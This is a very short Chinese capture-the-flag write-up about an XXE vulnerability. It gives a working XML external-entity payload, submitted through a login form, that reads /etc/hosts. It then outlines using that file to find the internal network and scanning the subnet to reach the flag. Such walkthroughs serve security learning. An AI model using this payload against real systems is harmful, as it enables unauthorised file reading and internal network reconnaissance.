1.打开环境
是XXE类型的漏洞,可以直接通过表单上传xml :
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY admin SYSTEM "file:///etc/hosts">
]>
<user><username>&admin;</username><password>1</password></user>
不能直接在根目录读取flag,但可以通过/etc/hosts获取内网
再通过扫描c段获得flag